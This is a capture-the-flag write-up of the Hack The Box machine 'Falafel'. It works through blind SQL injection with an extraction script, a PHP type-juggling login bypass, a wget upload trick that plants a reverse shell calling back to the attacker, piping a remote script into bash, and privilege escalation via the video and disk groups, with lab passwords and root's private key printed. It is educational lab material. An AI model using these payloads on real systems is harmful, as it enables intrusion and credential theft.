---
title: "HTB: Falafel"
date: 2021-04-25T16:21:14-07:00
draft: false 
---
![](/img/htb-falafel-title-card.png)
# Overview

Falafel is a retired Linux virtual machine on the [Hack The Box](https://app.hackthebox.eu) platform with a difficulty rating of **Hard**. Early steps in its exploitation require some creativity and scripting to advance to later stages. Let's start things off with a nice nmap scan.

# Initial Enumeration

`sudo nmap -sV -sC -v 10.10.10.73 -oN nmap/initial`

```
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-25 19:30 EDT
[...]
Nmap scan report for falafel.htb (10.10.10.73)
Host is up (0.085s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
|   256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_  256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B8A9422F95F0D71B26D25CE15206BB79
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/*.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

```

There's a web server on port 80 and a robots.txt file on it with an exclusion for .txt files. With a web browser we find a simple website with a login link that might prove useful. 

![](/img/htb-falafel-http-index.png)


Let's run a gobuster scan of files with a .txt extension based on that robots.txt file.

`gobuster dir -u http://10.10.10.73:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -l -s "200,204,301,302,307,403,500" -x "txt" -z -o "tcp_80_http_gobuster_dirbuster_txt.txt"`


```
cat tcp_80_http_gobuster_dirbuster_txt.txt
http://10.10.10.73:80/images (Status: 301) [Size: 311]
http://10.10.10.73:80/uploads (Status: 301) [Size: 312]
http://10.10.10.73:80/assets (Status: 301) [Size: 311]
http://10.10.10.73:80/css (Status: 301) [Size: 308]
http://10.10.10.73:80/js (Status: 301) [Size: 307]
http://10.10.10.73:80/robots.txt (Status: 200) [Size: 30]
http://10.10.10.73:80/cyberlaw.txt (Status: 200) [Size: 804]
```

**cyberlaw.txt** looks promising, let's check that.

```
$ curl http://10.10.10.73/cyberlaw.txt
From: Falafel Network Admin (admin@falafel.htb)
Subject: URGENT!! MALICIOUS SITE TAKE OVER!
Date: November 25, 2017 3:30:58 PM PDT
To: lawyers@falafel.htb, devs@falafel.htb
Delivery-Date: Tue, 25 Nov 2017 15:31:01 -0700
Mime-Version: 1.0
X-Spam-Status: score=3.7 tests=DNS_FROM_RFC_POST, HTML_00_10, HTML_MESSAGE, HTML_SHORT_LENGTH version=3.1.7
X-Spam-Level: ***

A user named "chris" has informed me that he could log into MY account without knowing the password,
then take FULL CONTROL of the website using the image upload feature.
We got a cyber protection on the login form, and a senior php developer worked on filtering the URL of the upload,
so I have no idea how he did it.

Dear lawyers, please handle him. I believe Cyberlaw is on our side.
Dear develpors, fix this broken site ASAP.

        ~admin
```

Interesting pieces of information. In addition to mention of privilege escalation and RCE vulnerabilities we can glean a few potentially useful usernames: chris, admin, devs, and lawyers.

### login.php

Visiting the login link in the upper-right hand corner of the web site, if we try logging in with username **admin**, password **foo** we get an eror "Wrong identification: admin". However, if we choose a nonsense username that can't possibly exist we get a different error on attempted login, "Try again". We can surmise that the first error, "Wrong identification", is one we receive with a valid username.
|||
|------|:---|
|![](/img/htb-falafel-login-error.png)|![](/img/htb-falafel-failed-admin-login.png)|

|Username|Error message|
|---------|:--|
|admin|Wrong identification: admin|
|chris|Wrong identification: chris|
|abc1234567890|Try again..|

It seems natural to attempt SQL injection at this point...

|Username|Error message|
|---------|:--|
|' or 1=1 limit 1; #|Wrong identification: admin|
|' or 1=2 limit 1; #|Try again..|

and it quickly becomes apparent that injection *is* possible but the only feedback we'll receive is on the success or failure of the attempt based on which of the two types of error message we get back. **Wrong identification** is our success message while **Try again** is our failure message. This is classic Blind SQL Injection.

Doing some research into blind SQLi we'll eventually come upon this writeup outlining [DB content extraction](https://www.exploit-db.com/papers/13650) (section [3]). 

In order for these to work we'll need to pair our queries with a username query that yields a TRUE result, so all statements will start with the valid username **admin**.

From the above writeup we'll employ a method to extract the username as [username]:[password].

|Username|Result|Meaning|
|-----|:---|:---|
|admin' and (select 1 from users limit 0,1)=1# | True|Table **users** exists
|admin' and (select substring(concat(1,password),1,1) from users limit 0,1)=1;# | True | Column **password** exists
|admin' and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),**1**,1))>**95**; #| True | First letter of username is greater than ascii(95)
|admin' and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),**1**,1))>**96**; #| True | First letter is greater than ascii(96)
|admin' and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),**1**,1))>**97**; #| False| Our first false value therefore **the first character** = ascii(97) = **'a'**
|**(Increment the character index from 1 to 2)**
|admin' and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),**2**,1))>**99**; #| True | Second letter > ascii(99)
|admin' and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),**2**,1))>**100**; # | False | Second letter is ascii(99) = **'d'**

We can see this is successfully extracting the username portion of the output but doing the rest of this by hand is going to be a chore. Let's scriptify the process.

`falafelextract.py`
```python
#!/usr/bin/env python3
import requests

url = 'http://10.10.10.73/login.php'

# iterate through ascii values until we hit an error

for user in range(0,2):
  for char in range(1,66):
    for i in range(32,126):
      response = requests.post(url, data={'username':'chris\' and ascii(substring((SELECT concat(username,0x3a,password) from users limit '+str(user)+',1),'+ str(char) +',1))>' + str(i) + '; # ','password':''})
      if response.text.find('Try again') > -1:
        print (chr(i), end="", flush=True)
        break
  print()
```
Doing this with the above script is ***slow***. It could be greatly sped up by replacing our linear search with a [binary one](https://en.wikipedia.org/wiki/Binary_search_algorithm), but as it is this author could use some time to go make a sandwich so let's just leave this current version to run.

{{< video src="/vid/falafelextract.webm" type="video/webm" preload="auto" >}} 
```
admin:0e462096931906507119562988736854                           
chris:d4ee02a22fc872e36d9e3751ba72ddc8
```

Remove the usernames and colons and write the hashes to a file. 
```
$ cat > falafel_hashes.txt
0e462096931906507119562988736854                           
d4ee02a22fc872e36d9e3751ba72ddc8
```

They look like MD5 hashes and running John against them bears fruit:

```
$ john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt falafel_hashes.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (Raw-MD5 [MD5 32/32])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
juggling         (?)
1g 0:00:00:04 DONE (2021-04-26 00:31) 0.2375g/s 3407Kp/s 3407Kc/s 3471KC/s  0841079575..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
```

Using the creds **chris** / **juggling** gets us into Chris' account.

![](/img/htb-falafel-chris-login.png)

He's a professional juggler who does pen testing as a hobby and says sometimes the two intersect. 

(You might argue with a simple password like **juggling** Chris ought to reflect further on what he's learned through his infosec hobby)

We know from **cyberlaw.txt** there is a logic error in the website and since it's written in PHP we can focus our research on common PHP logic errors related to logging in. And something perhaps related to juggling. 

A web search of "PHP juggling" leads us to results related to **[PHP type juggling](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/README.md)**. In a nutshell, because PHP is not a strongly typed language a programmer has to take extreme care when doing variable comparisons. Weird and unexpected things can happen when you do a loose comparison between an integer and a string, for example. In our case it might be that such a poorly constructed comparison is happening against the password hashes, and since we know the admin hash we can try this theory out. 


From the above link 
> If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float.

```
$ php -a
Interactive mode enabled

php > print (1 == 1);
bool(true)
php > var_dump (0.0 == '0e462096931906507119562988736854');
bool(true)
```


If this is the vulnerability present in the login process the hash for admin, then, is computed as a float!!! We only need to find another hash that will similarly be computed as a float. Fortunately for us the above link also includes such "magic" strings. md5(0e1137126905) = '0e291659922323405260514745084877' which should also be computed as a float and pass a loose comparison.

**admin** / **0e1137126905**

And it works!

Once we're logged in we're greeted with an image upload option.

![](/img/htb-falafel-admin-login.png)
# Abusing the image upload
If we upload a test image the website helpfully shows us the command being run in the background. It's **wget**'ing from a URL of our choosing, but the web page logic is restricting us to certain image-centric file extensions like .png and .gif. 

Playing around with the extension logic doesn't lead us anywhere but what about **wget**? It turns out **wget** has a URL length limitation and we can abuse that limitation to trim the end off the filename, leaving us with a file on the server ending with a .php extension. This exploit is detailed on [hacktricks]( https://book.hacktricks.xyz/pentesting-web/file-upload/#wget-file-upload-ssrf-trick).

> The maximum length of a filename in linux is 255, however, wget truncate the filenames to 236 characters. You can download a file called "A"*232+".php"+".gif", this filename will bypass the check (as in this example ".gif" is a valid extension) but wget will rename the file to "A"*232+".php".

For our payload let's use php-reverse-shell.php, which on kali is at `/usr/share/webshells/php/php-reverse-shell.php` First modify the php file to point to our attacking machine and port of choice.
![](/img/htb-falafel-reverse-php.png)


Then we can use the servefile script (`pip install servefile` if you don't have it) to serve up php-reverse-shell.php. All requests will be redirected to this file so we can play around with the filename in the payload without having to also rename the file on our web server.

```
$ sudo servefile -p 80 php-reverse-shell.php
Serving "php-reverse-shell.php" at port 80.
```

In a separate window start up a netcat listener on port 8888
```
rlwrap nc -nlvp 8888
```

And launch our exploit with curl. Log in as admin first, then direct the upload page to pull down **"A"\*232+".php"+".gif"**

Be sure to change the first URL in the second curl command to match your IP.
```
curl -c cookiejar -d 'username=admin&password=0e1137126905' http://10.10.10.73/login.php
curl -b cookiejar -d "url=http://10.10.x.x/$(python -c 'print("A"*(236-4)+".php"+".gif")')" http://10.10.10.73/upload.php
```

![](/img/htb-falafel-wget-exploit.png)

The script will place the file in a different directory each time so take note of the directory specified in the output of the command. In this case it was uploaded to **uploads/0426-1957_798b867cb0cf73d3**

```
curl http://10.10.10.73/uploads/0426-1957_798b867cb0cf73d3/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php
```

With some **sed** magic we can write a more universal curl command constructor:
```
curl -s -b cookiejar -d "url=http://YOUR IP HERE/$(python -c 'print("A"*(236-4)+".php"+".gif")')" http://10.10.10.73/upload.php | sed -n 's/.*uploads\/\([^;]*\); wget '\''http:\/\/[0-9]\+\.[0-9]\+\.[0-9]\+\.[0-9]\+\/\(\w\+\.php\).*/\n\nNow run:\ncurl http:\/\/10.10.10.73\/uploads\/\1\/\2/p'
```

On our netcat listener we should now have a reverse shell.
```
$ rlwrap nc -nlvp 8888
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 10.10.10.73.
Ncat: Connection from 10.10.10.73:49982.
Linux falafel 4.4.0-112-generic #135-Ubuntu SMP Fri Jan 19 11:48:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 19:58:10 up 17:30,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
yossi    tty1                      02:27   17:30m  0.04s  0.04s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh:
```

# Privilege Escalation #1
We have a shell as **www-data** and a useful thing to check after a web application exploit is for any embedded database credentials in the web app just compromised.

```bash
$ cd /var/www/html
$ ls
assets
authorized.php
connection.php
css
cyberlaw.txt
footer.php
header.php
icon.png
images
index.php
js
login.php
login_logic.php
logout.php
profile.php
robots.txt
style.php
upload.php
uploads
```

Of these connection.php looks most promising, and indeed it contains credentials!

```
$ cat connection.php
<?php
   define('DB_SERVER', 'localhost:3306');
   define('DB_USERNAME', 'moshe');
   define('DB_PASSWORD', 'falafelIsReallyTasty');
   define('DB_DATABASE', 'falafel');
   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
   // Check connection
   if (mysqli_connect_errno())
   {
      echo "Failed to connect to MySQL: " . mysqli_connect_error();
   }
?>
```

There's a user moshe on the machine with shell access:
```
grep moshe /etc/passwd
moshe:x:1001:1001::/home/moshe:
```

Unfortunately for Moshe the above password was re-used for the system account.
```bash
$ ssh moshe@10.10.10.73
moshe@10.10.10.73's password: falafelIsReallyTasty
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Mon Feb  5 23:35:10 2018 from 10.10.14.2
$ ls -l
total 4
-r-------- 1 moshe moshe 33 Nov 27  2017 user.txt
```
Grab the `user.txt` file and let's move on to the next step!

# Privilege Escalation #2
Use [linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) to automate much of the enumeration.

`curl http://10.10.x.x/linpeas.sh | bash`

We learn through our enumeration that this machine is protected by AppArmor, and further, based on login history it looks like the most recent snapshot of the VM was taken just a few months ago. My assumption is the new snapshot was taken after updates had been applied. These two pieces of information suggest to me the exploit path is going to be less focused on patch management related issues.

We also see that moshe is part of a number of groups, some of which stand out as uncommon to me:
```
$ groups
moshe adm mail news voice floppy audio video games
```

We can do a search of the filesystem for files that each group owns. When we do this for the **video** group we get this
```
$ find / -group video 2> /dev/null
/dev/fb0
/dev/dri/card0
/dev/dri/renderD128
/dev/dri/controlD64
```

A quick internet search of "video /dev/fb0 exploit" eventually leads to [this](https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe) writeup on exploiting access to this group. In fact the example used is this very machine.
> Using the command w you can find who is logged on the system and it will show an output like the following one:
```
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
yossi    tty1                      22:16    5:13m  0.05s  0.04s -bash
moshe    pts/1    10.10.14.44      02:53   24:07   0.06s  0.06s /bin/bash
```

> The tty1 means that the user yossi is logged physically to a terminal on the machine.
> 
> The video group has access to view the screen output. Basically you can observe the the screens. In order to do that you need to grab the current image on the screen in raw data and get the resolution that the screen is using. The screen data can be saved in /dev/fb0 and you could find the resolution of this screen on /sys/class/graphics/fb0/virtual_size

```
moshe@falafel:/tmp$ cat /dev/fb0 > /tmp/screen.raw
moshe@falafel:/tmp$ cat /sys/class/graphics/fb0/virtual_size
1176,885
```

Copy screen.raw to our attacking machine 
```
$ scp moshe@10.10.10.73:/tmp/screen.raw .
moshe@10.10.10.73's password: falafelIsReallyTasty
screen.raw                                                                                                                  100% 4065KB 271.8KB/s   00:14
```
and load it up in Gimp. You may need to install an external program to handle RAW image files in Gimp.

In the open dialog window expand the "Select file type" dropdown and select **Raw image data**

![](/img/htb-falafel-gimp-load-options.png)

In the next window update the image size to match the dimensions we extracted from falafel and change the Image Type to **RGB565 Big Endian**. The image preview window instantly shows us the contents of yossi's screen, which contains a password.

![](/img/htb-falafel-raw-image-preview.png)

`yossi / MoshePlzStopHackingMe!`

```
$ ssh yossi@10.10.10.73
yossi@10.10.10.73's password: MoshePlzStopHackingMe!
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 26 02:27:55 2021
yossi@falafel:~$
```
# Privilege Escalation #3 (to root)
Let's look at yossi's groups.
```
yossi@falafel:~$ groups
yossi adm disk cdrom dip plugdev lpadmin sambashare
```

The **disk** group immediately jumps out as odd and potentially powerful. Again revisiting hacktricks we find a [writeup about the power of this group](https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/#disk-group).

>This privilege is almost equivalent to root access as you can access all the data inside of the machine.

We'll first find the partition '/' is mounted from and run debugfs against it to extract root's private SSH key.
```
yossi@falafel:~$ df -h
Filesystem      Size  Used Avail Use% Mounted on
udev            477M     0  477M   0% /dev
tmpfs           100M  5.8M   94M   6% /run
/dev/sda1       6.8G  2.3G  4.2G  36% /
tmpfs           497M     0  497M   0% /dev/shm
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs           497M     0  497M   0% /sys/fs/cgroup
tmpfs           100M     0  100M   0% /run/user/1000
yossi@falafel:~$ debugfs -w /dev/sda1
debugfs 1.42.13 (17-May-2015)
debugfs:  cat /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAyPdlQuyVr/L4xXiDVK8lTn88k4zVEEfiRVQ1AWxQPOHY7q0h
b+Zd6WPVczObUnC+TaElpDXhf3gjLvjXvn7qGuZekNdB1aoWt5IKT90yz9vUx/gf
v22+b8XdCdzyXpJW0fAmEN+m5DAETxHDzPdNfpswwYpDX0gqLCZIuMC7Z8D8Wpkg
BWQ5RfpdFDWvIexRDfwj/Dx+tiIPGcYtkpQ/UihaDgF0gwj912Zc1N5+0sILX/Qd
UQ+ZywP/qj1FI+ki/kJcYsW/5JZcG20xS0QgNvUBGpr+MGh2urh4angLcqu5b/ZV
dmoHaOx/UOrNywkp486/SQtn30Er7SlM29/8PQIDAQABAoIBAQCGd5qmw/yIZU/1
eWSOpj6VHmee5q2tnhuVffmVgS7S/d8UHH3yDLcrseQhmBdGey+qa7fu/ypqCy2n
gVOCIBNuelQuIAnp+EwI+kuyEnSsRhBC2RANG1ZAHal/rvnxM4OqJ0ChK7TUnBhV
+7IClDqjCx39chEQUQ3+yoMAM91xVqztgWvl85Hh22IQgFnIu/ghav8Iqps/tuZ0
/YE1+vOouJPD894UEUH5+Bj+EvBJ8+pyXUCt7FQiidWQbSlfNLUWNdlBpwabk6Td
OnO+rf/vtYg+RQC+Y7zUpyLONYP+9S6WvJ/lqszXrYKRtlQg+8Pf7yhcOz/n7G08
kta/3DH1AoGBAO0itIeAiaeXTw5dmdza5xIDsx/c3DU+yi+6hDnV1KMTe3zK/yjG
UBLnBo6FpAJr0w0XNALbnm2RToX7OfqpVeQsAsHZTSfmo4fbQMY7nWMvSuXZV3lG
ahkTSKUnpk2/EVRQriFjlXuvBoBh0qLVhZIKqZBaavU6iaplPVz72VvLAoGBANj0
GcJ34ozu/XuhlXNVlm5ZQqHxHkiZrOU9aM7umQkGeM9vNFOwWYl6l9g4qMq7ArMr
5SmT+XoWQtK9dSHVNXr4XWRaH6aow/oazY05W/BgXRMxolVSHdNE23xuX9dlwMPB
f/y3ZeVpbREroPOx9rZpYiE76W1gZ67H6TV0HJcXAoGBAOdgCnd/8lAkcY2ZxIva
xsUr+PWo4O/O8SY6vdNUkWIAm2e7BdX6EZ0v75TWTp3SKR5HuobjVKSht9VAuGSc
HuNAEfykkwTQpFTlmEETX9CsD09PjmsVSmZnC2Wh10FaoYT8J7sKWItSzmwrhoM9
BVPmtWXU4zGdST+KAqKcVYubAoGAHR5GBs/IXFoHM3ywblZiZlUcmFegVOYrSmk/
k+Z6K7fupwip4UGeAtGtZ5vTK8KFzj5p93ag2T37ogVDn1LaZrLG9h0Sem/UPdEz
HW1BZbXJSDY1L3ZiAmUPgFfgDSze/mcOIoEK8AuCU/ejFpIgJsNmJEfCQKfbwp2a
M05uN+kCgYBq8iNfzNHK3qY+iaQNISQ657Qz0sPoMrzQ6gAmTNjNfWpU8tEHqrCP
NZTQDYCA31J/gKIl2BT8+ywQL50avvbxcXZEsy14ExVnaTpPQ9m2INlxz97YLxjZ
FEUbkAlzcvN/S3LJiFbnkQ7uJ0nPj4oPw1XBcmsQoBwPFOcCEvHSrg==
-----END RSA PRIVATE KEY-----
```
On our attacking machine save this private key to a file (we'll call it root_id_rsa here) and change its permissions to 600.

```bash
$ cat > root_id_rsa
[paste text from above]
[Ctrl-D]
$ chmod 600 root_id_rsa
$ ls -l root_id_rsa
-rw------- 1 kali kali 1679 Apr 23 23:21 root_id_rsa
$
```
(We could instead use the above debugfs tool on **falafel** to copy the id_rsa file elsewhere on the system that **yossi** has access to and ssh to root@localhost with it.)

Then run `ssh -i root_id_rsa root@10.10.10.73`

![](/img/htb-falafel-gotroot.png)

We have a root shell! Grab root.txt and we're done! Thank you for reading!

